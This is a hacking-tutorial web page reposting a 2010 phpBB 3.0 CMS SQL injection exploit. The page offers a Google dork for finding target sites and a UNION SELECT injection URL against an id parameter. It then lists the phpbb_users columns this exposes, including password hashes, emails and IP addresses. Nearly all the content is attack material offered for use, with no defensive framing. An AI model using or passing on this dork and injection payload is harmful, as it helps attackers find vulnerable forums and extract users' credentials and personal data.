<-----TFH - CReW ----->[Offical Page] (Tuttorial-For-Hack)
Navigation
  Phpbb EXPLOIT
 

===========================================
PHPBB 3.0.* CMS SQL Injection Vulnerability
===========================================

# Exploit Title: PHPBB 3.0.* CMS SQLinjection



# Date: 2010-08-27



# Team: eX.ploit ( Abjects #ex.ploit )



# Software Link: http://www.phpbb.com/



# Version: PHPBB3.0.* CMS only (does not work on FORUM only)



# Tested on: Linux



# Usage: SQLinjection



# Gain detailed database information



# Code:



Google dork:[inurl:mypage.php?id= & "Powered by phpBB"]

# Tested on:linux/php 

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ BUG @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@



Url| http://www.website.com/news_view.php?id=1


Vuln: http://www.website.com/news_view.php?id=1+and+1=0+ Union Select UNHEX(HEX([visible])) ,2,3,4







Returns



Columns: Table phpbb_users



user_type



group_id



user_permissions



user_perm_from



user_ip



user_regdate



username



username_clean



user_password



user_passchg



user_pass_convert



user_email



user_email_hash



user_birthday



user_lastvisit



user_lastmark



user_lastpost_time



user_lastpage



user_last_confirm_key



user_last_search



user_warnings



user_last_warning



user_login_attempts



user_inactive_reason



user_inactive_time



user_posts



user_lang



user_timezone



user_dst



user_dateformat



user_style



user_rank



user_colour



user_new_privmsg



user_unread_privmsg



user_last_privmsg



user_message_rules



user_full_folder



user_emailtime



user_topic_show_days



user_topic_sortby_type



user_topic_sortby_dir



user_post_show_days



user_post_sortby_type



user_post_sortby_dir



user_notify



user_notify_pm



user_notify_type



user_allow_pm



user_allow_viewonline



user_allow_viewemail



user_allow_massemail



user_options



user_avatar



user_avatar_type



user_avatar_width



user_avatar_height



user_sig



user_sig_bbcode_uid



user_sig_bbcode_bitfield



user_from



user_icq



user_aim



user_yim



user_msnm



user_jabber



user_website



user_occ



user_interests



user_actkey



user_newpasswd



user_form_salt





-------------------

 
  
  Today, there have been 24 visitors (67 hits) on this page!  
 
This website was created for free with Own-Free-Website.com. Would you also like to have your own website?
Sign up for free